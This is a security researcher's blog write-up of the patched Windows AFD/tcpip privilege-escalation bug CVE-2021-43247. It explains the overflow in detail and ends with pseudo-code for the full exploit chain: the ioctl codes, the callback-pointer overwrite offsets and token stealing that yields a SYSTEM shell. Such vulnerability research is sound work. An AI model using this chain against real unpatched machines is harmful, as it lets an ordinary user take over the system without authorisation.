In this blog post I will go in depth into the inner workings of CVE-2021-43247, which was fixed on the 14th of December 2021. This bug was classified as “Windows TCP/IP Driver Elevation of Privilege Vulnerability”. The vulnerability itself was probably dormant for a long time, but became exploitable when the AF_UNIX address family was first introduced in 2019.

I will also take this as an excuse to explain in detail what drivers are, how user space communicates with drivers, what a Local Privilege Escalation (LPE) is and how we can achieve it in this case.

The goal / what is an LPE (Local Privilege Escalation)

A Local Privilege Escalation (sometimes also called Elevation of Privilege or EoP) is an exploit which obtains some privilege that it is not supposed to be able to get. In the traditional cases (as in this one) this means we start out with a normal user shell and end up with administrator access. On Linux this would be about obtaining a root shell. This is usually done through a bug in a privileged process, a bug in a driver or a bug in the operating system itself.

As the CVE description tells us, we are dealing with a bug in the TCP/IP driver.

What are drivers and how does user space communicate with them?

Drivers are simply PE files which the kernel loads into the kernel address space. PE (Portable Executable) is the executable file format used by Windows; it is used by “.exe” and “.dll” files. Drivers usually have the file extension “.sys”, but there are also library drivers which get the “.dll” file extension. Most drivers are contained in the “C:\windows\system32\drivers” directory. Which drivers are loaded on system startup is determined by the registry and the physical devices available to the system.

User space can communicate with the loaded drivers using kernel system calls (or syscalls for short). For example, consider the following program:

// blog_socket.c - small example program used in this blog

#include <winsock2.h> // WinSock 2 header, matching the requested version 2.2

int main() {
    // Initialize WinSock
    WSAStartup(MAKEWORD(2, 2), &(WSADATA){0});

    // Create a TCP/IPv4 socket.
    SOCKET Socket = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    
    // Bind the socket to any address
    bind(Socket, &(struct sockaddr){AF_INET}, sizeof(struct sockaddr));
}

When the program calls socket, we can observe the following call stack:

00 ntdll!NtCreateFile
01 mswsock!SockSocket+0x56e
02 mswsock!WSPSocket+0x23a
03 WS2_32!WSASocketW+0x130
04 WS2_32!socket+0x6e
05 blog_socket!main+0x84

ntdll!NtCreateFile is the function that actually transitions into the kernel address space. The assembly for all ntdll!NtXxx functions looks something like the following:

NtCreateFile:
   mov r10, rcx   ; load the first argument into r10, as the syscall
                  ; instruction uses rcx as the return location
   mov eax, 0x55  ; load the syscall value into eax (0x55 is 'NtCreateFile')
   
   test byte ptr [.Running32Bit], 1 ; check if we are running a 32bit executable
   jnz .Syscallx86
   
   ; syscall transitions into the kernel. 
   syscall
   ret
   
.Syscallx86:
   ; x86 does not have a syscall instruction, use int 0x2e instead of syscall.
   int 0x2e
   ret

We will only focus on the x64 case here. The syscall instruction loads the new instruction pointer from a specialized hardware register (called a model specific register or MSR), namely the MSR IA32_LSTAR. It also stores the return address (in this case the address of the ret instruction) into rcx and sets the privilege level of the processor to 0. This is why kernel mode is sometimes referred to as ring 0.

When the processor is running at privilege level 0, it can access kernel space memory. Here it is important to know that the address space does not change, but at non-zero privilege level the processor faults when it is accessing a page which does not have the USER bit set in the page table.
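The rule above can be sketched as a small model. This is only an illustration, not how the hardware is implemented: the bit positions follow the x86-64 page table entry format (bit 0 is Present, bit 2 is User/Supervisor), while the function name access_faults is made up for this post.

```c
#include <assert.h>
#include <stdbool.h>
#include <stdint.h>

#define PTE_PRESENT (1ull << 0) /* page is mapped */
#define PTE_USER    (1ull << 2) /* U/S bit: set means user mode may access */

/* Simplified model: returns true if a data access made at privilege level
   `cpl` to a page described by `pte` would raise a page fault. */
bool access_faults(uint64_t pte, int cpl)
{
    assert(cpl >= 0 && cpl <= 3);
    if (!(pte & PTE_PRESENT))
        return true;               /* unmapped pages always fault */
    if (cpl == 3 && !(pte & PTE_USER))
        return true;               /* user mode touching a kernel page */
    return false;                  /* same address space, access allowed */
}
```

Note that the model never switches page tables: the only input that changes between user mode and kernel mode is the privilege level.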

In Windows 10 the IA32_LSTAR MSR points to the function nt!KiSystemCall64, which first establishes a stack pointer:

KiSystemCall64:
    swapgs                        ; load saved kernel thread locals from some MSR
    mov gs:[gs.user_stack], rsp   ; save user stack, in the kernel thread locals
    mov rsp, gs:[gs.kernel_stack] ; load kernel space stack, from the thread locals

    ; ... from here we are just in kernel space, and can do whatever we want
    ;     e.g. Save all the registers and then call the according NtXxx
    ;          kernel function depending on eax.

The kernel then figures out what kernel function was requested by looking at eax and transitions to it. In this case we end up in nt!NtCreateFile (on the kernel side).
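Conceptually, this dispatch is a table lookup indexed by eax. The following is a toy model under that assumption; the handler names and the table size are hypothetical, and the real kernel table is laid out differently.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

typedef int32_t (*service_fn)(void);

/* Hypothetical stand-ins for kernel services. */
int32_t svc_create_file(void) { return 0; }
int32_t svc_not_modeled(void) { return -1; }

#define SERVICE_COUNT 0x56
static service_fn service_table[SERVICE_COUNT];

/* Fill the toy table; only index 0x55 (NtCreateFile in this post) is modeled. */
void init_service_table(void)
{
    for (size_t i = 0; i < SERVICE_COUNT; i++)
        service_table[i] = svc_not_modeled;
    service_table[0x55] = svc_create_file;
}

/* Model of the dispatch step: validate the index, then call through the table. */
int32_t dispatch(uint32_t eax)
{
    if (eax >= SERVICE_COUNT)
        return -1;                          /* unknown service number */
    assert(service_table[eax] != NULL);     /* init_service_table() must run first */
    return service_table[eax]();
}
```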

00 nt!NtCreateFile                  <-- Kernel space function   
01 nt!KiSystemServiceCopyEnd+0x25
02 ntdll!NtCreateFile+0x14          <-- User space function
03 mswsock!SockSocket+0x4ec
04 mswsock!WSPSocket+0x233
05 WS2_32!WSASocketW+0x1be
06 WS2_32!socket+0x9b

Note that the address space is still the same as in user space; the difference is that we are now allowed to access kernel memory. The arguments to nt!NtCreateFile are unchanged from the arguments ntdll!NtCreateFile received, so the kernel very carefully validates all arguments and copies them safely to kernel space memory.

In this case “mswsock.dll” tries to open a HANDLE to AFD or the “Ancillary Function Driver for WinSock”.

AFD

AFD is located at “C:\windows\system32\drivers\afd.sys” and provides implementations for the usual socket functions.

As I have hopefully been able to convince you, the socket function corresponds to opening a HANDLE to AFD using NtCreateFile. Using the HANDLE returned by NtCreateFile, all further communication occurs via NtDeviceIoControlFile:

__kernel_entry NTSTATUS NtDeviceIoControlFile(
  [in]  HANDLE           FileHandle,
  [in]  HANDLE           Event,
  [in]  PIO_APC_ROUTINE  ApcRoutine,
  [in]  PVOID            ApcContext,
  [out] PIO_STATUS_BLOCK IoStatusBlock,
  [in]  ULONG            IoControlCode,
  [in]  PVOID            InputBuffer,
  [in]  ULONG            InputBufferLength,
  [out] PVOID            OutputBuffer,
  [in]  ULONG            OutputBufferLength
);

Here, each socket function corresponds to an IoControlCode, or ioctl for short. For example, if we bind the socket, we end up in afd!AfdBind:

00 afd!AfdBind
01 afd!AfdDispatchDeviceControl+0x7d
02 nt!IofCallDriver+0x59
03 nt!IopSynchronousServiceTail+0x1b1
04 nt!IopXxxControlFile+0xe0c
05 nt!NtDeviceIoControlFile+0x56
06 nt!KiSystemServiceCopyEnd+0x25
07 ntdll!NtDeviceIoControlFile+0x14
08 mswsock!WSPBind+0x278
09 WS2_32!bind+0xdf
0a blog_socket!main+0x137

Similarly, recv corresponds to AfdReceive, send corresponds to AfdSend and so on. The arguments and return values of these functions are serialized into the InputBuffer and OutputBuffer, respectively.

The Bug

The bug combines three different features that Windows 10 provides: the TCP_FASTOPEN option, the ConnectEx/AfdSuperConnect function and the AF_UNIX address family.

TCP_FASTOPEN

According to Wikipedia, the TCP_FASTOPEN option allows the client, under certain conditions, to start sending data to the host without waiting for the ACK packet. For us, what it does is not important, only that it has to be enabled for the later call to AfdSuperConnect to reach the vulnerable code.

AF_UNIX

As mentioned by this blog, the vulnerability probably turned exploitable when Windows started supporting sockets of type AF_UNIX. AF_UNIX sockets provide a means of inter-process communication. For us the important fact is that the associated sockaddr looks like this:

#define UNIX_PATH_MAX 108

typedef struct sockaddr_un
{
     ADDRESS_FAMILY sun_family;     /* AF_UNIX */
     char sun_path[UNIX_PATH_MAX];  /* pathname */
} SOCKADDR_UN, *PSOCKADDR_UN;

With a size of 110 = 0x6e bytes, this structure is therefore quite large.
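The size can be checked with a few lines of C. This sketch redefines the structure under a different name (sockaddr_un_model) so that it compiles without the Windows headers; it assumes ADDRESS_FAMILY is a 16-bit unsigned integer, as it is in the Windows SDK.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

#define UNIX_PATH_MAX 108

/* Stand-in for SOCKADDR_UN with the same field layout. */
struct sockaddr_un_model {
    uint16_t sun_family;               /* AF_UNIX, 2 bytes */
    char     sun_path[UNIX_PATH_MAX];  /* pathname, 108 bytes */
};

/* 2 + 108 = 110 = 0x6e, with no padding because the alignment is 2. */
static_assert(sizeof(struct sockaddr_un_model) == 0x6e,
              "sockaddr_un is expected to be 110 bytes");

size_t sockaddr_un_size(void) { return sizeof(struct sockaddr_un_model); }
size_t sun_path_offset(void)  { return offsetof(struct sockaddr_un_model, sun_path); }
```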

ConnectEx

The ConnectEx function is a Microsoft-specific extension whose function pointer can be queried using WSAIoctl. The underlying kernel function is AfdSuperConnect. Sadly, the user space API validates the arguments to ConnectEx, so we have to reach AfdSuperConnect through NtDeviceIoControlFile instead. Because the socket functions do not expose the underlying handles to AFD, this in turn forces us to use NtCreateFile and NtDeviceIoControlFile directly for all communication with AFD.

AfdSuperConnect gets invoked when using NtDeviceIoControlFile with the ioctl 0x120c7. The input buffer for this call consists of 10 bytes, most of which seem to be unused, followed by an arbitrary sockaddr. The vulnerability occurs when AfdSuperConnect attempts to connect to a sockaddr of type AF_UNIX.

The Setup

  1. Create an AF_INET socket using NtCreateFile.
  2. Enable the TCP_FASTOPEN option using AfdTliIoControl (NtDeviceIoControlFile with ioctl 0x120bf).
  3. Bind the socket to any address using ioctl AfdBind (NtDeviceIoControlFile with ioctl 0x12003).
  4. Trigger the vulnerability by using AfdSuperConnect (NtDeviceIoControlFile with ioctl 0x120c7) passing a sockaddr of type AF_UNIX.
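The three ioctl values in this list share a visible pattern. The sketch below decodes them under an assumption that is not confirmed by Microsoft documentation: that AFD builds its control codes as (base << 12) | (request << 2) | method, which is the layout used in public reconstructions of the AFD headers such as the one in ReactOS. The values 0x12 (FILE_DEVICE_NETWORK) and 3 (METHOD_NEITHER) are documented Windows constants; the struct and function names are made up for this post.

```c
#include <assert.h>
#include <stdint.h>

struct afd_ioctl {
    uint32_t base;     /* expected to be 0x12, FILE_DEVICE_NETWORK */
    uint32_t request;  /* index of the AFD operation */
    uint32_t method;   /* buffering method, 3 is METHOD_NEITHER */
};

/* Build a control code under the assumed layout. */
uint32_t encode_afd_ioctl(uint32_t base, uint32_t request, uint32_t method)
{
    assert(method <= 0x3 && request < 0x400);
    return (base << 12) | (request << 2) | method;
}

/* Split a control code back into its assumed fields. */
struct afd_ioctl decode_afd_ioctl(uint32_t code)
{
    struct afd_ioctl d;
    d.method  = code & 0x3;
    d.request = (code >> 2) & 0x3ff;
    d.base    = code >> 12;
    return d;
}
```

Under this assumption, 0x12003 decodes to request 0, 0x120bf to request 0x2f and 0x120c7 to request 0x31, all with method 3.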

As we opened the socket as an AF_INET socket, the call to AfdSuperConnect ends up in tcpip!TcpTlProviderConnectAndSend.

00 tcpip!TcpTlProviderConnectAndSend
01 afd!AfdSuperConnect+0x10b26
02 afd!AfdDispatchDeviceControl+0x7d
03 nt!IofCallDriver+0x59
04 nt!IopSynchronousServiceTail+0x1b1
05 nt!IopXxxControlFile+0xe0c
06 nt!NtDeviceIoControlFile+0x56

tcpip!TcpCreateConnectTcb checks early on whether the TCP_FASTOPEN option is enabled. If it is not, the function returns with the error code STATUS_RETRY. If it is, the function allocates a big internal structure and later on copies the sockaddr we provided into that structure.

// Ghidra Decompilation from (tcpip!TcpCreateConnectTcb)

SockaddrFamily = *TlConnect->ConnectSockaddr;
if (SockaddrFamily < 0x23) {
    sockaddr_size = (&::sockaddr_size)[SockaddrFamily];
}
      /* this is where the magic happens */
memcpy(&_Dst->contains_the_function_pointer->sockaddr,
       TlConnect->ConnectSockaddr, sockaddr_size);

Crucially, as this is all happening in “tcpip.sys”, the code only expects a sockaddr of type AF_INET or AF_INET6, which are of size 0x1c and 0x24, respectively. Hence, tcpip only reserves 0x24 bytes of memory for said sockaddr, and we can overwrite 0x6e - 0x24 = 0x4a bytes past the space reserved for the sockaddr. Fortunately for us, this range of bytes contains a callback function pointer (originally pointing to afd!AfdTLBufferedSendComplete) and its callback context argument.
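The arithmetic can be written down as a small check. The sizes 0x24 and 0x6e come from the text above, and the offsets 0x5c and 0x64 are the ones used for the callback pointer and its context in the pseudo-code at the end of this post; the function names are illustrative only.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>

#define RESERVED_SOCKADDR_SIZE 0x24  /* space tcpip sets aside for the sockaddr */
#define SOCKADDR_UN_SIZE       0x6e  /* bytes copied for an AF_UNIX sockaddr */

/* Number of bytes written past the reserved space. */
size_t overflow_bytes(size_t copy_size, size_t reserved)
{
    return copy_size > reserved ? copy_size - reserved : 0;
}

/* True if a field at [offset, offset + size) lies entirely in the overflowed region. */
bool field_is_overwritten(size_t offset, size_t size,
                          size_t copy_size, size_t reserved)
{
    assert(size > 0);
    return offset >= reserved && offset + size <= copy_size;
}
```

Both 8-byte fields fit: 0x5c + 8 = 0x64 and 0x64 + 8 = 0x6c, which is still within the 0x6e bytes copied.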

Prior to the vulnerable memcpy:

kd> dq rax + f8 L2
ffffac8e`6702a138  fffff806`2d0db540 ffffac8e`6841c9e0
kd> ln fffff806`2d0db540
    (fffff806`2d0db540)   afd!AfdTLBufferedSendComplete

After the vulnerable memcpy:

kd> dq ffffac8e`6702a138 L2
ffffac8e`6702a138  13371337`13371337 deaddead`deaddead

The call to tcpip!TcpTlProviderConnectAndSend eventually fails, returning a status code of STATUS_INVALID_ADDRESS_COMPONENT, but not before trying to “complete” the request, by calling the callback function pointer, passing its callback context as the first argument.

Breakpoint 3 hit
tcpip!guard_dispatch_icall_nop:
fffff803`11e36490 ffe0            jmp     rax
kd> r rax, rcx
rax=1337133713371337 rcx=deaddeaddeaddead
kd> k
 # Child-SP          RetAddr           Call Site
00 ffffeb0f`32dc18e8 fffff803`11d767fd tcpip!guard_dispatch_icall_nop
01 ffffeb0f`32dc18f0 fffff803`11d73840 tcpip!TcpCreateAndConnectTcbComplete+0xc39
02 ffffeb0f`32dc1b30 fffff803`11d88e2a tcpip!TcpShutdownTcb+0x1040
03 ffffeb0f`32dc1f20 fffff803`11d88d38 tcpip!TcpCreateAndConnectTcbInspectConnectComplete+0xba
04 ffffeb0f`32dc2000 fffff803`11d87be8 tcpip!TcpContinueCreateAndConnect+0x1044
05 ffffeb0f`32dc2220 fffff803`11d87998 tcpip!TcpCreateAndConnectTcbInspectConnectRequestComplete+0x118
06 ffffeb0f`32dc2330 fffff803`11d8709d tcpip!TcpCreateAndConnectTcbWorkQueueRoutine+0x8a8
07 ffffeb0f`32dc2450 fffff803`11ea2247 tcpip!TcpCreateAndConnectTcb+0xcb5
08 ffffeb0f`32dc25d0 fffff803`11995606 tcpip!TcpTlProviderConnectAndSend+0x17
09 ffffeb0f`32dc2600 fffff803`1198958d afd!AfdSuperConnect+0x10b26

Exploitability, Mitigations and Complications

As we have seen, the vulnerability gives us full control of the instruction pointer rip and the first argument rcx, and does so by calling into a function pointer we can freely choose. A vulnerability this good is almost always exploitable. But we first have to jump through some hoops…

SMEP (Supervisor Mode Execution Prevention)

The simplest idea to exploit a bug of this kind would be to set the instruction pointer to a user space address, i.e., to write some shellcode that, when executed in kernel mode, will elevate the permissions of the current process. Sadly, Intel thought of this long ago and introduced SMEP. SMEP uses the fact that user pages have the USER flag set in the page tables to throw an exception when the kernel executes any user address.
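As a rough model of the rule SMEP adds, consider the following sketch. The bit positions follow the x86-64 page table entry format (bit 0 Present, bit 2 User/Supervisor, bit 63 no-execute); the function name and the simplifications (no large pages, NX support assumed to be on) are my own.

```c
#include <assert.h>
#include <stdbool.h>
#include <stdint.h>

#define PTE_PRESENT (1ull << 0)   /* page is mapped */
#define PTE_USER    (1ull << 2)   /* page is accessible from user mode */
#define PTE_NX      (1ull << 63)  /* page must not be executed */

/* Simplified model: returns true if fetching an instruction from the page
   described by `pte` at privilege level `cpl` would fault. */
bool fetch_faults(uint64_t pte, int cpl, bool smep_enabled)
{
    assert(cpl >= 0 && cpl <= 3);
    if (!(pte & PTE_PRESENT) || (pte & PTE_NX))
        return true;   /* unmapped or non-executable page */
    if (cpl == 3 && !(pte & PTE_USER))
        return true;   /* user mode executing a kernel page */
    if (cpl < 3 && (pte & PTE_USER) && smep_enabled)
        return true;   /* SMEP: supervisor mode executing a user page */
    return false;
}
```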

ASLR (Address Space Layout Randomization)

Okay, so just executing user space code is out of the question, but what if we first load our shellcode into the kernel? First off, though it sounds hard, it is actually really easy to allocate arbitrary rwx-memory in kernel space using pipes:

char rwx_memory [0x100] = { <my_shellcode> }; // cannot contain zeroes

HANDLE read_pipe;
HANDLE write_pipe;
CreatePipe (&read_pipe, &write_pipe, NULL, NULL);

// ends up in 'NpSetAttribute'
NtFsControlFile(write_pipe, NULL, NULL, NULL, &status, 0x11003C, 
    rwx_memory, sizeof(rwx_memory), output, sizeof(output));

But as far as I know, there is no way for us to know where this allocation will end up (without another exploit or administrator privileges which would defeat the purpose). Even if we could control the heap perfectly we do not know where the heap starts. This is because of ASLR (Address Space Layout Randomization). At system startup, Windows randomizes all addresses it will use during runtime.

So…? Can we somehow get or leak addresses (or pointers) from the kernel? Fortunately, Windows is very nice to us in this respect. There is a user space function called NtQuerySystemInformation, which can be used to retrieve a lot of different kinds of information depending on an InformationClass. The InformationClass we are interested in is SystemModuleInformation. Using it, we can obtain the loaded base address of every currently running driver on the system, including the kernel (ntoskrnl.exe) itself.

By parsing the images contained on disk and using these base addresses, we know the address of every exported kernel function. One could go one step further and look at all symbols using the public symbols (.pdb) provided by Microsoft, but for our purposes restricting the search to exported functions was enough.
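The address computation itself is plain rebasing. In this sketch the function name is illustrative; 0x140000000 is the usual preferred image base of 64-bit PE files, and the loaded base in the usage note is a made-up value.

```c
#include <assert.h>
#include <stdint.h>

/* Translate an address expressed relative to the image's preferred base
   (as printed by on-disk tools) into the address it has once the image
   is loaded at `loaded_base`. */
uint64_t rebase_address(uint64_t preferred_va,
                        uint64_t preferred_base,
                        uint64_t loaded_base)
{
    assert(preferred_va >= preferred_base);
    uint64_t rva = preferred_va - preferred_base;  /* relative virtual address */
    return loaded_base + rva;
}
```

For example, with a hypothetical loaded base of 0xfffff80000000000, the on-disk address 0x140200050 maps to 0xfffff80000200050.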

CFG (Control Flow Guard)

Okay, the plan is to call exported kernel functions, but there (potentially) is one more obstacle in our way: the CFG (Control Flow Guard) mitigation. I did not emphasize this above, but looking at the call stack to the vulnerable call, we can see that we are inside of a function called guard_dispatch_icall_nop. This means that Control Flow Guard is disabled. If it were enabled, we would instead be inside nt!guard_dispatch_icall. nt!guard_dispatch_icall checks whether the address we are jumping to is registered as a CFG target. If the target is not registered, nt!guard_dispatch_icall crashes the system (mitigating the exploit). This registration happens when the driver is loaded. The binary contains information on which functions are valid CFG targets.

You can also view the CFG information using dumpbin:

> dumpbin /loadconfig C:\windows\system32\ntoskrnl.exe
Microsoft (R) COFF/PE Dumper Version 14.28.29336.0
Copyright (C) Microsoft Corporation.  All rights reserved.


Dump of file C:\windows\system32\ntoskrnl.exe

File Type: EXECUTABLE IMAGE

  Section contains the following load config:

    <...>

    Guard CF Function Table

          Address
          --------
           0000000140200010
       E   0000000140200050
           00000001402000B0
           00000001402001A0
       E   0000000140200580
       E   0000000140200940
       E   00000001402009F0
           0000000140200C40
           00000001402010B0
           00000001402010E0
           0000000140201200
       E   0000000140201750
       E   0000000140201770
           .
           .
           .
           

Therefore, if the exploit is supposed to work even if CFG is enabled, we need to choose a target function that is a valid CFG target.
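Checking a candidate against such a table is a simple lookup. The sketch below models the check as a binary search over a sorted list of addresses like the one dumpbin prints; this is an assumption made for illustration (at runtime Windows consults a bitmap rather than searching this table), and the function names are hypothetical.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdlib.h>

/* Three-way comparison of two 64-bit addresses for bsearch. */
static int compare_u64(const void *a, const void *b)
{
    uint64_t x = *(const uint64_t *)a;
    uint64_t y = *(const uint64_t *)b;
    return (x > y) - (x < y);
}

/* Returns true if `address` appears in the sorted table of valid targets. */
bool is_cfg_target(const uint64_t *table, size_t count, uint64_t address)
{
    assert(table != NULL || count == 0);
    if (count == 0)
        return false;
    return bsearch(&address, table, count, sizeof *table, compare_u64) != NULL;
}
```

Only exact function start addresses pass: a pointer into the middle of a listed function is rejected.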

IRQL (Interrupt Request Level)

One last detail that bears mentioning is the Interrupt Request Level (IRQL). The Interrupt Request Level is a hardware feature that allows threads to specify which interrupts they are willing to accept. Importantly, if the IRQL is >= 2 (called DISPATCH_LEVEL on Windows), the thread is not allowed to page-fault anymore. This means that when the IRQL is at least two, the thread cannot access pageable memory anymore.

Pageable memory is memory that the Windows kernel reserves the right to spill to disk if the system is running low on memory. If a thread then accesses that memory, a page fault occurs and the Windows kernel reloads the page from disk.

Why is all this important? Well, it just so happens that the function pointer we are overwriting is a “Completion Routine”. Completion routines may run at IRQL = 2 and therefore might crash the system whenever they access pageable memory. All user space memory is pageable, and thus the exploit might crash when accessing user space memory. Further, not all kernel space functions are non-paged (though most are), which further restricts the set of functions we can use in the exploit.

In reality, we are only interested in providing a proof of concept, so one could just ignore the fact that the exploit crashes sometimes, but we actually have a solution:

Sometimes, when the kernel uses a piece of user space memory, it uses so-called Memory Descriptor Lists (MDLs). When such a list is “locked”, the kernel will never page out the memory it describes. Therefore, we just have to make some request that will “lock” an MDL for the user space memory we are using, and then we can reliably use it at IRQL = 2.
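The rule can be summarized as a tiny decision function. The three level names and values are the ones Windows uses; the function names and the boolean describing the memory are illustrative.

```c
#include <assert.h>
#include <stdbool.h>

enum irql_level { PASSIVE_LEVEL = 0, APC_LEVEL = 1, DISPATCH_LEVEL = 2 };

/* Page faults can only be serviced below DISPATCH_LEVEL. */
bool may_page_fault(int irql)
{
    assert(irql >= 0);
    return irql < DISPATCH_LEVEL;
}

/* An access is safe if the memory cannot be paged out (non-paged memory or
   pages locked through an MDL), or if a page fault could still be handled. */
bool access_is_safe(int irql, bool memory_is_resident)
{
    return memory_is_resident || may_page_fault(irql);
}
```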

Primitives

So, we have control over rip and rcx and can call some exported kernel functions, but what is the plan? Roughly, we want to obtain exploit primitives which allow us to read and write kernel memory:

u64  read_u64(u64 kernel_address);
void write_u64(u64 kernel_address, u64 value);

These will later be used to give our process administrator privileges using a generalized exploit algorithm.

We construct these primitives by using the vulnerability with an exported kernel function. The perfect kernel function for a read primitive would look something like this:

void read_function(struct read_argument *read){
    read->value = read->pointer->value;
}

And the perfect write function would look something like this:

void write_function(struct write_argument *write){
    *write->pointer = write->value;
}

Here the read/write argument would be a pointer to user space memory. This means we have full control of the value of read->pointer and write->pointer, respectively. These pointers then get dereferenced: in the write case the controlled write->value is stored to the target, and in the read case the target is read and the result is stored back into user space memory.

If one cannot find primitives as perfect as these, one can search for functions that spread the first argument. The perfect spread function would be something like:

void spread_function(struct arguments *arguments){
    (*arguments->function)(arguments->argument_1, arguments->argument_2, 
                           arguments->argument_3, arguments->argument_4);
}

Using the perfect spread function one could obtain a read/write function as follows:

void read_write_function_called_by_spread_function(
        struct argument_1 *arg_1, struct argument_2 *arg_2){
        
    arg_1->value = arg_2->value;
}

In practice, we used two spread functions and then different read and write functions.

Windows Exploitation tricks and the general exploit algorithm

The exploitation algorithm we are using is called “Token Stealing”. You can find a lot of information on it online, but we will give a short overview.

Every process has an internal _EPROCESS kernel structure. The access rights of the process are contained in an internal kernel structure called _TOKEN. The _EPROCESS structure references this token, by pointer.

kd> dt nt!_EPROCESS Token
   +0x358 Token : _EX_FAST_REF

kd> dt nt!_EX_FAST_REF
    +0x000 Object           : Ptr64 Void
    +0x000 RefCnt           : Pos 0, 4 Bits
    +0x000 Value            : Uint8B
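As the dump shows, the low 4 bits of an _EX_FAST_REF hold a reference count, so the stored value is not the raw pointer. A minimal sketch of how such a value splits apart (the function names are made up for this post):

```c
#include <assert.h>
#include <stdint.h>

#define EX_FAST_REF_COUNT_MASK 0xfull  /* RefCnt: Pos 0, 4 Bits */

/* Pointer part of a fast reference: clear the reference count bits. */
uint64_t fast_ref_object(uint64_t value)
{
    return value & ~EX_FAST_REF_COUNT_MASK;
}

/* Reference count part of a fast reference. */
unsigned fast_ref_count(uint64_t value)
{
    return (unsigned)(value & EX_FAST_REF_COUNT_MASK);
}

/* Combine a 16-byte aligned object pointer and a count into one value. */
uint64_t make_fast_ref(uint64_t object, unsigned count)
{
    assert((object & EX_FAST_REF_COUNT_MASK) == 0 && count <= 0xf);
    return object | count;
}
```

This matters whenever a Token field is compared against a plain _TOKEN address: the comparison has to ignore the low 4 bits.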

Now, if we control the _TOKEN, we have control of all access rights. One option would be to use the read and write primitive to directly alter the access token, but in this case there is a simpler way. If we can locate a process which has SYSTEM access rights, we can simply copy the _TOKEN-pointer of the SYSTEM process into the _EPROCESS->Token of our process. And it just so happens that the kernel exports a pointer to the nt!PsInitialSystemProcess which has SYSTEM access rights.

Therefore, the basic algorithm would be:

  1. Use the read primitive to read the value of (nt!PsInitialSystemProcess)->Token
  2. Use the write primitive to write the value to our _EPROCESS->Token field.

Token Stealing

But two problems remain:

  1. As the _EPROCESS structure is undocumented and subject to change, the offset of the Token field varies by kernel version.
  2. We do not know where our _EPROCESS structure is.

This is where Windows is really helpful again. Just as we can find all base addresses of kernel modules using NtQuerySystemInformation(SystemModuleInformation), we can find the address of both our _EPROCESS structure (solving 2) and our _TOKEN structure using NtQuerySystemInformation(SystemHandleInformation). Now, using the read primitive, we can iterate through our _EPROCESS structure and locate the _TOKEN structure. This then gives us the offset of the Token field.
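The offset search can be illustrated on an ordinary local buffer standing in for the structure. This is a sketch on mock data, not the read primitive itself; the function name is hypothetical, and the masking of the low 4 bits follows the _EX_FAST_REF layout shown earlier.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Scan 8-byte slots of a structure for a fast reference to `token`.
   Returns the byte offset of the first match, or -1 if there is none. */
long find_token_offset(const uint64_t *words, size_t word_count, uint64_t token)
{
    assert((token & 0xf) == 0);  /* the token address itself is 16-byte aligned */
    for (size_t i = 0; i < word_count; i++) {
        /* Ignore the low 4 bits, which hold a reference count. */
        if ((words[i] & ~0xfull) == token)
            return (long)(i * sizeof(uint64_t));
    }
    return -1;
}
```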

Putting it all together in pseudo-code, it looks something like this:

// Use the Windows API to get all the information we want.
token, process := find_token_and_process_using_NtQuerySystemInformation();
PsInitialSystemProcess_export, read_function, write_function := 
        find_exported_symbols_using_NtQuerySystemInformation();

// Use a system call that is more or less equivalent to 
// `socket = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)`
socket_handle := NtCreateFile("\\Device\\Afd", EaBuffer = {AF_INET, SOCK_STREAM, IPPROTO_TCP});

// use the system call that is equivalent to 
// `setsockopt(socket, IPPROTO_TCP, TCP_FASTOPEN, &(u32){1}, 1)`
NtDeviceIoControlFile(socket_handle, 0x120bf, .input_buffer = {SetSockOpt, .level = IPPROTO_TCP, .option = TCP_FASTOPEN, .optval = &(u32){1}, .optlen = 1});

// use the system call that is equivalent to 
// `bind(socket, &(struct sockaddr){AF_INET}, sizeof(struct sockaddr))`
NtDeviceIoControlFile(socket_handle, 0x12003, ...);

// The read and write primitives now work by triggering the vulnerability by calling 
// `AfdSuperConnect` through the `NtDeviceIoControlFile`.
function u64 read_u64(u64 address):
    read_argument := {.pointer = address};
    // the sockaddr has to be of type AF_UNIX, so that 0x6e bytes are copied
    NtDeviceIoControlFile(socket_handle, 0x120c7, .input_buffer = {.sockaddr = {AF_UNIX, .offset_0x5c = read_function, .offset_0x64 = &read_argument}});
    return read_argument.value;

function void write_u64(u64 address, u64 value):
    write_argument := {.pointer = address, .value = value};
    NtDeviceIoControlFile(socket_handle, 0x120c7, .input_buffer = {.sockaddr = {AF_UNIX, .offset_0x5c = write_function, .offset_0x64 = &write_argument}});

// figure out the token_offset, by linearly scanning through our `_EPROCESS`
for i from 0 to 0x1000:
    maybe_token := read_u64(process + i * 8);
    // the low 4 bits of the `_EX_FAST_REF` are a reference count, ignore them
    if (maybe_token & ~0xf) == token:
        token_offset := i * 8;
        break;

// figure out the `_TOKEN` of `nt!PsInitialSystemProcess`
PsInitialSystemProcess = read_u64(PsInitialSystemProcess_export);
PsInitialSystemProcessToken = read_u64(PsInitialSystemProcess + token_offset);

// actually steal the access `_TOKEN` by overwriting the Token field of our
// own `_EPROCESS`, which gives us complete access rights.
write_u64(process + token_offset, PsInitialSystemProcessToken);

// spawn a shell to keep the access rights in a clean way.
spawn_shell();

Success - An Administrator Shell